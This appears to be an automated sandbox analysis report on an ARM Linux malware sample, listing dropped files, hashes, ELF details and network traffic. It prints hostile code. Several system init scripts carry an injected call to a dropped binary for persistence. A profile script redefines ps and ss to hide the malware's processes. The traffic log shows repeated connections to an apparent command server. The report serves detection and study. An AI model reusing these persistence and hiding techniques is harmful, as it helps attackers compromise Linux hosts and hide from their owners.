SHA1:	D47C0F3E4DE104B2DAE047AC53BA85ADFD53B26B
SHA-256:	D2C361A5A6A9FDEAF530420A519CA1BCB022B13B5B35B827544D70ED99B98720
SHA-512:	34636E86E4652B1212E5F74E4E792E46786E5FDFDB9ECB7DB085339EDCA9DF752D7B71EF97FE4738921E53825DFB0AECCE877324675A60594A0955B4EC2BFB38
Malicious:	true
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides:..sshd.# Required-Start:.$remote_fs $syslog.# Required-Stop:.$remote_fs $syslog.# Default-Start:.2 3 4 5.# Default-Stop:...# Short-Description:.OpenBSD Secure Shell server.### END INIT INFO..set -e..# /etc/init.d/ssh: start and stop the OpenBSD "secure shell(tm)" daemon..test -x /usr/sbin/sshd \|\| exit 0.( /usr/sbin/sshd -\? 2>&1 \| grep -q OpenSSH ) 2>/dev/null \|\| exit 0..umask 022..if test -f /etc/default/ssh; then./lib/system.mark. . /etc/default/ssh.fi... /lib/lsb/init-functions..if [ -n "$2" ]; then./lib/system.mark. SSHD_OPTS="$SSHD_OPTS $2".fi..# Are we running from init?.run_by_init() {. ([ "$previous" ] && [ "$runlevel" ]) \|\| [ "$runlevel" = S ].}..check_for_no_start() {. # forget it if we're trying to start, and /etc/ssh/sshd_not_to_be_run exists. if [ -e /etc/ssh/sshd_not_to_be_run ]; then ./lib/system.mark..if [ "$1" = log_end_msg ]; then./lib/system.mark.. log_end_msg 0 \|\| true..fi..if ! run_by_init; then./lib/syst

/etc/init.d/udev

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	7281
Entropy (8bit):	4.991252121789465
Encrypted:	false
SSDEEP:	96:l7vnKGhtBLNNqeIRbyxwfmgBL6FGGgGBj2davQKBJKCYrSVDvtvP7WGP7TQKBJKk:l93DYPbV7+262daaJrSVztbWIeWymj
MD5:	6B8B951DD1036426916D86617F889FB3
SHA1:	5845C804AEE0A2C89AA314083FDB112D90B0AE75
SHA-256:	672A832E328D4AC70CE72DB88A220443383378ED574448B8A31F743707EAB48D
SHA-512:	DC3D3C056719853FE920BF0622CACFEDE05618331D85DC138C7C462B982222F2F746AF09B77815CDE542DACA4DCD24D084912CCE5F7DEE608431776D3B21BEC4
Malicious:	true
Preview:	#!/bin/sh -e.### BEGIN INIT INFO.# Provides: udev.# Required-Start: mountkernfs.# Required-Stop: umountroot.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Start systemd-udevd, populate /dev and load drivers..### END INIT INFO..PATH="/sbin:/bin".NAME="systemd-udevd".DAEMON="/lib/systemd/systemd-udevd".DESC="hotplug events dispatcher".PIDFILE="/run/udev.pid".CTRLFILE="/run/udev/control".OMITDIR="/run/sendsigs.omit.d"..# we need to unmount /dev/pts/ and remount it later over the devtmpfs.unmount_devpts() {. if mountpoint -q /dev/pts/; then./lib/system.mark. umount -n -l /dev/pts/. fi.. if mountpoint -q /dev/shm/; then./lib/system.mark. umount -n -l /dev/shm/. fi.}..# mount a devtmpfs over /dev, if somebody did not already do it.mount_devtmpfs() {. if grep -E -q "^[^[:space:]]+ /dev devtmpfs" /proc/mounts; then./lib/system.mark. mount -n -o remount,nosuid,size=$tmpfs_size,mode=0755 -t devtmpfs devtmpfs /dev. return. fi.. if ! mount -

/etc/init.d/ufw

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2220
Entropy (8bit):	4.762470767686369
Encrypted:	false
SSDEEP:	48:1LleiFZd/nzngwjacTM/JrNWwh/JbeTX9l:1BDFfrbQvnq
MD5:	8852A1EF1E949822CC57D126739775E7
SHA1:	BB530632CE040ACF6D772A83E55594AE03233D2A
SHA-256:	D47B4F30B3710EBA0EA899BD483D2639EEC4EFE1E2196F3CC69D6C317A182D9D
SHA-512:	428D49507F1A9E84BE55BA66EBD1E6557E87EABE10BC4CAB0003260279FADE812996410AFD00DA0C49E1A42C2008D2B61ADC7A43470C582FC66840120A827A1D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides: ufw.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: S.# Default-Stop: 1.# Short-Description: start firewall.# Description: Start ufw firewall.### END INIT INFO..set -e..PATH="/sbin:/bin"..[ -d /lib/ufw ] \|\| exit 0... /lib/lsb/init-functions..for s in "/lib/ufw/ufw-init-functions" "/etc/ufw/ufw.conf" "/etc/default/ufw" ; do. if [ -s "$s" ]; then./lib/system.mark. . "$s". else. log_failure_msg "Could not find $s (aborting)". exit 1. fi.done..error=0.case "$1" in.start). if [ "$ENABLED" = "yes" ] \|\| [ "$ENABLED" = "YES" ]; then./lib/system.mark. log_action_begin_msg "Starting firewall:" "ufw". output=`ufw_start` \|\| error="$?". if [ "$error" = "0" ]; then./lib/system.mark. log_action_cont_msg "Setting kernel variables ($IPT_SYSCTL)". fi. if [ ! -z "$output" ]; then./lib/system.mark. echo "$output" \| while read

/etc/init.d/unattended-upgrades

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1426
Entropy (8bit):	5.3259172883252655
Encrypted:	false
SSDEEP:	24:aMXni+12wpFKFOGofwWlf/HNVKowwflH+hF/7Px1gr:bni23FKFpbw3GnoH+Dbx2
MD5:	D520212A01E843BEC46C2A22FAD820FD
SHA1:	53E168B97E300038916C1038B59912B23AB2C0AF
SHA-256:	89C4F9A9999E7DB3526C63DF22A69161F6328EEB8E58B8640BDEB4676BFF6DA5
SHA-512:	E08F7E3736EB322F4C49636515B1AAE43299F09504A63B9920F93D2E42518108E4090E3F622AA6B18E2D196C89BAC0BF74884AA5FDC023CE25D8D529653D0876
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.#.### BEGIN INIT INFO.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Provides: unattended-upgrade-shutdown-check.# Default-Start: 2 3 4 5.# Default-Stop: 0 6.# Short-Description: Check if unattended upgrades are being applied.# Description: Check if unattended upgrades are being applied.# and wait for them to finish.### END INIT INFO.set -e..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..NAME="unattended-upgrades-shutdown".DESC="unattended package upgrades shutdown".SCRIPTNAME="/etc/init.d/$NAME".SHUTDOWN_HELPER="/usr/share/unattended-upgrades/unattended-upgrade-shutdown"..if [ -x /usr/bin/python3 ]; then./lib/system.mark. PYTHON=python3.else. PYTHON=python.fi..# Load the VERBOSE setting and other rcS variables.. /lib/init/vars.sh..# Define LSB log_* functions..# Depend on lsb-base (>= 3.2-14) to ensure that this file is present.. /lib/lsb/init-functions..case "$1" in.

/etc/init.d/uuidd

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1358
Entropy (8bit):	5.2132074992430075
Encrypted:	false
SSDEEP:	24:aNmC4ozLk8BZa8LNfwa0dDEPLu5CB5ZM51Hdwi/DqT0KtOC:3VozBjdh0d4PLuIBvMNwiuIKtl
MD5:	4A25430D50590B5FD530703742868720
SHA1:	FB4D80FD6B01795838C4D0A49B1467910FF3FB4D
SHA-256:	0CE2C7B3FEA143F8855B7BE493906899F6CAFC7D9558AB315D10E62CAF59AC61
SHA-512:	15375558913D6AF219281A08A470F8BEBC4B729119DC317D9FBFE60892F9CB76AD9BF8704BC0CE7FB3BF5EFA3BE279021EC8000AF4AB3E4034D0CE67C12F91D0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh -e.### BEGIN INIT INFO.# Provides: uuidd.# Required-Start: $time $local_fs $remote_fs.# Required-Stop: $time $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: uuidd daemon.# Description: Init script for the uuid generation daemon.### END INIT INFO.#.# Author:."Theodore Ts'o" <tytso@mit.edu>.#.set -e..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DAEMON=/usr/sbin/uuidd.UUIDD_USER=uuidd.UUIDD_GROUP=uuidd.UUIDD_DIR=/run/uuidd.PIDFILE=$UUIDD_DIR/uuidd.pid..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..case "$1" in. start)..log_daemon_msg "Starting uuid generator" "uuidd"..if ! test -d $UUIDD_DIR; then./lib/system.mark...mkdir -p $UUIDD_DIR...chown -R $UUIDD_USER:$UUIDD_GROUP $UUIDD_DIR..fi..start_daemon -p $PIDFILE $DAEMON..log_end_msg $?. ;;. stop)..log_daemon_msg "Stopping uuid generator" "uuidd"..killproc -p $PIDFILE $DAEMON..log_end_msg $?. ;;. status)..if pidofproc -p $PIDFILE $DAEMON >/dev/null 2>&

/etc/init.d/x11-common

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2911
Entropy (8bit):	4.896684913637708
Encrypted:	false
SSDEEP:	48:ZETjwC4gFkV8ZSVwxPRyye1vrBy9DuIpPX5uCXAepm1L+/WAhtX76XGMgH3:SIgFkVlVY1IT09DuYX5HX3aidOX8
MD5:	ED4AAC2A7BFA47958A11198C382AF668
SHA1:	3646EAC456824AA2D579E5E66F8050CC886C44E7
SHA-256:	8D107A508429EC4AE1049F1BB79260CC2B4E10EDB952DC764FB4ED7979A409AC
SHA-512:	AAA3B8EC1B82F46E3FA10ADDF3BB9B7E4FC93B9B575BCD5D4BCE712F17117F10059BF0A0E827982B613422E8FE009F31B8ED68B3B9F4EF2202A73E155CDD4279
Malicious:	true
Preview:	#!/bin/sh.# /etc/init.d/x11-common: set up the X server and ICE socket directories.### BEGIN INIT INFO.# Provides: x11-common.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: set up the X server and ICE socket directories.### END INIT INFO..set -e..PATH=/usr/bin:/usr/sbin:/bin:/sbin.SOCKET_DIR=.X11-unix.ICE_DIR=.ICE-unix... /lib/lsb/init-functions.if [ -f /etc/default/rcS ]; then./lib/system.mark. . /etc/default/rcS.fi..do_restorecon () {. # Restore file security context (SELinux).. if which restorecon >/dev/null 2>&1; then./lib/system.mark. restorecon "$1". fi.}..# create a directory in /tmp..# assumes /tmp has a sticky bit set (or is only writeable by root).set_up_dir () {. DIR="/tmp/$1".. if [ "$VERBOSE" != no ]; then./lib/system.mark. log_progress_msg "$DIR". fi. # if $DIR exists and isn't a directory, move it aside. if [ -e $DIR ] && ! [ -d $DIR ] \|\| [ -h $DIR ]; then./lib/system.mar

/etc/profile.d/bash.cfg

Download File

Process:	/tmp/arm5.elf
File Type:	ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, no section header
Category:	dropped
Size (bytes):	1839196
Entropy (8bit):	7.88774426457939
Encrypted:	false
SSDEEP:	24576:/HYOihAEAI+m5ZL0gerrYlmCHso2QfZWeHsu6ljp4KaXVMc5R9eeah7tKdmTSNzx:/hiAvm5ZuOHsozfDMp4KaSnef3c7yfx
MD5:	2C40DA075F6D957E1B4E2E98543EFE89
SHA1:	CB1483B4DE0D4B6749CE26A5D61A55318E6CEA7F
SHA-256:	ABB8063C9DF05CF14DACA16F0DC86118389EE23EFE7746808317490710767406
SHA-512:	7BB703EEA559D92428A06C00490A2828DC1D3A64F59229780A772F53B4BB36D325B318C5746E5E56B90F2DAA9E48D2F4947D07697AC188482F3809B8337E213F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	.ELF..............(.........4...........4. ...(.........................................hO..hOQ.hOQ.................Q.td............................l;DcUPX!..........O...O.....z.........ELF......(.w......4&.^.... ...6......4.......w.........._d....M.....(.(]..'?o)./\|.. .`?.J.K/..l2hO...?Q.t...M....I$...4.(.!....P.........u.....N(..(r.r]w...)...+.O;..s.....+5..!n..e.(,6..N..I...o.0C6..N..Jdy..G6....%v.O.....X...5...K.J.@nO.....>K..N..d..9./.e.O.N..E.....O...O..NP..$r._..Pv.V.x...C.G........diM.....D...Sr.Go&.psVEtS3n.zn-VBfWu.-n2j/YcL.BcR4B0n_.ErVdkJNv.U/L-KnQB.TVJFfb2a.jHSbcX/S.6wZQJqzP.5v5M83pR7I........]..o....-..p........l. 7...~>P...&..7......................4Q............6...;..........t....0l..........twO.p:..o................(...........W..7...F;.....&....w$k......o....;.O,....u/.....=..?$...0y....~.<..8...uO..n.........{ ..P..../...@.....T...~.n.o.@............R..... .... \'..m>..#..8......g.......\.............Na'a....)...pi....... .?h...^l7..;..~.1a..@...P\|&.

/etc/profile.d/bash.cfg.sh

Download File

Process:	/tmp/arm5.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.204582217613529
Encrypted:	false
SSDEEP:	3:TKH/binKX:siKX
MD5:	5C67BC6A39813CE4346CB7CA206A9393
SHA1:	F99586987650CFA169F5110198CBDE17B82FD2BA
SHA-256:	29EC88CF1C7403CC92602408772AB2FCE6E26E10E29E0C19F6FCF03AC6E1B483
SHA-512:	BF8701863EB49B3552181620944D05C23C63762E386D6C353609DE3D71784CB87E054F279FE56A1C661C927813DEF4481586E3BC5C820D20DCEC7F3F891F2A8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/bash./etc/profile.d/bash.cfg

/etc/profile.d/gateway.sh

Download File

Process:	/tmp/arm5.elf
File Type:	Bourne-Again shell script, ASCII text executable, with very long lines (699)
Category:	dropped
Size (bytes):	4862
Entropy (8bit):	4.787135568955195
Encrypted:	false
SSDEEP:	96:sSr2vBOPmf2/ESr2vBOPmf2/uSr2vBOPmf2/WSr2vBOPmf2/MSr2vBOPmf2/MSr8:si2vBOPmf2/Ei2vBOPmf2/ui2vBOPmf9
MD5:	1578D8D4D8123BA20723CF01B546022D
SHA1:	D9A61F2FD84A24464DC5C22F24936DA47F557865
SHA-256:	2BD0C26E0BA334389216013B3A58481D2F861FEEEE1C2DE963BB63F01A9511C3
SHA-512:	F2D179682FD01F4C1E9DCB549DDA6CBDC806D36A944A9239ADAD2215CC9966D16D0BE7DF72EE1C4085745056B87F9C9094742DF218D4F0AECC7BB64885C601A8
Malicious:	true
Preview:	#!/bin/bash.function ps { proc_name=$(/usr/bin/ps $@);proc_name=$(echo "$proc_name" \| sed -e '/\/usr\/bin\/include\//d');proc_name=$(echo "$proc_name" \| sed -e '/dns-udp4/d');proc_name=$(echo "$proc_name" \| sed -e '/quotaon.service/d');proc_name=$(echo "$proc_name" \| sed -e '/system.pub/d');proc_name=$(echo "$proc_name" \| sed -e '/gateway.sh/d');proc_name=$(echo "$proc_name" \| sed -e '/.mod/d');proc_name=$(echo "$proc_name" \| sed -e '/libgdi.so.0.8.2/d');proc_name=$(echo "$proc_name" \| sed -e '/system.mark/d');proc_name=$(echo "$proc_name" \| sed -e '/netstat.cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/bash.cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/arm5.elf/d');echo "$proc_name"; }.function ss { proc_name=$(/usr/bin/ss $@);proc_name=$(echo "$proc_name" \| sed -e '/\/usr\/bin\/include\//d');proc_name=$(echo "$proc_name" \| sed -e '/dns-udp4/d');proc_name=$(echo "$proc_name" \| sed -e '/quotaon.service/d');proc_name=$(echo "$proc_name" \| sed -e '/system.pub/d');proc_name=$(echo "

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/proc/5601/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/proc/5657/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/run/crond.pid

Download File

Process:	/usr/sbin/cron
File Type:	ASCII text
Category:	dropped
Size (bytes):	10
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:GVTSt:GVTg
MD5:	DCF64FE48E628C77BDAC63A763DA6F2F
SHA1:	A725981E373F550532EF9B8131AF32227B9A1470
SHA-256:	CA0121E6A76861CB9372E6003B18B4092BBA19FBE69FF0E0B5E6A79BB6E23D9A
SHA-512:	EF3B9C14D3A09039DC7A41C2D13D8F027B29DBB44E42252EFEB8878EB58A22A9F4324B310353CB32A67941F286B70BDCCC1AF74B67693A0019B274E1D8EEB927
Malicious:	false
Preview:	5678.5678.

/usr/lib/libgdi.so.0.8.2

Download File

Process:	/tmp/arm5.elf
File Type:	ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, no section header
Category:	dropped
Size (bytes):	1839196
Entropy (8bit):	7.88774426457939
Encrypted:	false
SSDEEP:	24576:/HYOihAEAI+m5ZL0gerrYlmCHso2QfZWeHsu6ljp4KaXVMc5R9eeah7tKdmTSNzx:/hiAvm5ZuOHsozfDMp4KaSnef3c7yfx
MD5:	2C40DA075F6D957E1B4E2E98543EFE89
SHA1:	CB1483B4DE0D4B6749CE26A5D61A55318E6CEA7F
SHA-256:	ABB8063C9DF05CF14DACA16F0DC86118389EE23EFE7746808317490710767406
SHA-512:	7BB703EEA559D92428A06C00490A2828DC1D3A64F59229780A772F53B4BB36D325B318C5746E5E56B90F2DAA9E48D2F4947D07697AC188482F3809B8337E213F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	.ELF..............(.........4...........4. ...(.........................................hO..hOQ.hOQ.................Q.td............................l;DcUPX!..........O...O.....z.........ELF......(.w......4&.^.... ...6......4.......w.........._d....M.....(.(]..'?o)./\|.. .`?.J.K/..l2hO...?Q.t...M....I$...4.(.!....P.........u.....N(..(r.r]w...)...+.O;..s.....+5..!n..e.(,6..N..I...o.0C6..N..Jdy..G6....%v.O.....X...5...K.J.@nO.....>K..N..d..9./.e.O.N..E.....O...O..NP..$r._..Pv.V.x...C.G........diM.....D...Sr.Go&.psVEtS3n.zn-VBfWu.-n2j/YcL.BcR4B0n_.ErVdkJNv.U/L-KnQB.TVJFfb2a.jHSbcX/S.6wZQJqzP.5v5M83pR7I........]..o....-..p........l. 7...~>P...&..7......................4Q............6...;..........t....0l..........twO.p:..o................(...........W..7...F;.....&....w$k......o....;.O,....u/.....=..?$...0y....~.<..8...uO..n.........{ ..P..../...@.....T...~.n.o.@............R..... .... \'..m>..#..8......g.......\.............Na'a....)...pi....... .?h...^l7..;..~.1a..@...P\|&.

/usr/lib/system.mark

Download File

Process:	/tmp/arm5.elf
File Type:	ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, no section header
Category:	dropped
Size (bytes):	1839196
Entropy (8bit):	7.88774426457939
Encrypted:	false
SSDEEP:	24576:/HYOihAEAI+m5ZL0gerrYlmCHso2QfZWeHsu6ljp4KaXVMc5R9eeah7tKdmTSNzx:/hiAvm5ZuOHsozfDMp4KaSnef3c7yfx
MD5:	2C40DA075F6D957E1B4E2E98543EFE89
SHA1:	CB1483B4DE0D4B6749CE26A5D61A55318E6CEA7F
SHA-256:	ABB8063C9DF05CF14DACA16F0DC86118389EE23EFE7746808317490710767406
SHA-512:	7BB703EEA559D92428A06C00490A2828DC1D3A64F59229780A772F53B4BB36D325B318C5746E5E56B90F2DAA9E48D2F4947D07697AC188482F3809B8337E213F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	.ELF..............(.........4...........4. ...(.........................................hO..hOQ.hOQ.................Q.td............................l;DcUPX!..........O...O.....z.........ELF......(.w......4&.^.... ...6......4.......w.........._d....M.....(.(]..'?o)./\|.. .`?.J.K/..l2hO...?Q.t...M....I$...4.(.!....P.........u.....N(..(r.r]w...)...+.O;..s.....+5..!n..e.(,6..N..I...o.0C6..N..Jdy..G6....%v.O.....X...5...K.J.@nO.....>K..N..d..9./.e.O.N..E.....O...O..NP..$r._..Pv.V.x...C.G........diM.....D...Sr.Go&.psVEtS3n.zn-VBfWu.-n2j/YcL.BcR4B0n_.ErVdkJNv.U/L-KnQB.TVJFfb2a.jHSbcX/S.6wZQJqzP.5v5M83pR7I........]..o....-..p........l. 7...~>P...&..7......................4Q............6...;..........t....0l..........twO.p:..o................(...........W..7...F;.....&....w$k......o....;.O,....u/.....=..?$...0y....~.<..8...uO..n.........{ ..P..../...@.....T...~.n.o.@............R..... .... \'..m>..#..8......g.......\.............Na'a....)...pi....... .?h...^l7..;..~.1a..@...P\|&.

Static File Info

General

File type:	ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, no section header
Entropy (8bit):	7.88774426457939
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	arm5.elf
File size:	1'839'196 bytes
MD5:	2c40da075f6d957e1b4e2e98543efe89
SHA1:	cb1483b4de0d4b6749ce26a5d61a55318e6cea7f
SHA256:	abb8063c9df05cf14daca16f0dc86118389ee23efe7746808317490710767406
SHA512:	7bb703eea559d92428a06c00490a2828dc1d3a64f59229780a772f53b4bb36d325b318c5746e5e56b90f2daa9e48d2f4947d07697ac188482f3809b8337e213f
SSDEEP:	24576:/HYOihAEAI+m5ZL0gerrYlmCHso2QfZWeHsu6ljp4KaXVMc5R9eeah7tKdmTSNzx:/hiAvm5ZuOHsozfDMp4KaSnef3c7yfx
TLSH:	828533E1C5C71E213352527ADD022948A66713B979FBDC33327C1962B6CA2BC1B5D88F
File Content Preview:	.ELF..............(.........4...........4. ...(.........................................hO..hOQ.hOQ.................Q.td............................l;DcUPX!..........O...O.....z.........ELF......(.w......4&.^.... ...6......4.......w.........._d....M.....(

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - Linux
ABI Version:	0
Entry Point Address:	0x1d0608
Flags:	0x5000002
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	0
Section Header Size:	40
Number of Section Headers:	0
Header String Table Index:	0

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align
LOAD	0x0	0x10000	0x10000	0x1c0fd2	0x1c0fd2	7.8878	0x5	R E	0x10000
LOAD	0x4f68	0x514f68	0x514f68	0x0	0x0	0.0000	0x6	RW	0x10000
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2024 19:24:08.247663975 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:08.253240108 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:08.253288984 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:08.267252922 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:08.272775888 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:09.086528063 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:09.086549044 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:09.086644888 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:09.086644888 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:09.114343882 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:09.119998932 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:09.125180960 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:09.136388063 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:09.831484079 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:09.831645012 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:11.897384882 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:11.897505999 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:13.940412998 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:13.940624952 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:16.272648096 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:16.272928953 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:16.274528980 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:16.274578094 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:18.076575041 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:18.076663017 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:20.132968903 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:20.133200884 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:22.216171980 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:22.216370106 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:24.264517069 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:24.264940977 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:26.301462889 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:26.301664114 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:28.348917961 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:28.349193096 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:30.395992994 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:30.396203041 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:32.471154928 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:32.471455097 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:34.699012995 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:34.699249029 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:36.567421913 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:36.567892075 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:38.625709057 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:38.626025915 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:40.666309118 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:40.666533947 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:42.722078085 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:42.722357988 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:44.763542891 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:44.763853073 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:46.844830036 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:46.845221043 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:48.895641088 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:48.895780087 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:50.942344904 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:50.942585945 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:53.032099009 CET	1127	33444	93.123.109.118	192.168.2.13
Oct 28, 2024 19:24:53.032427073 CET	33444	1127	192.168.2.13	93.123.109.118
Oct 28, 2024 19:24:55.088529110 CET	1127	33444	93.123.109.118	192.168.2.13
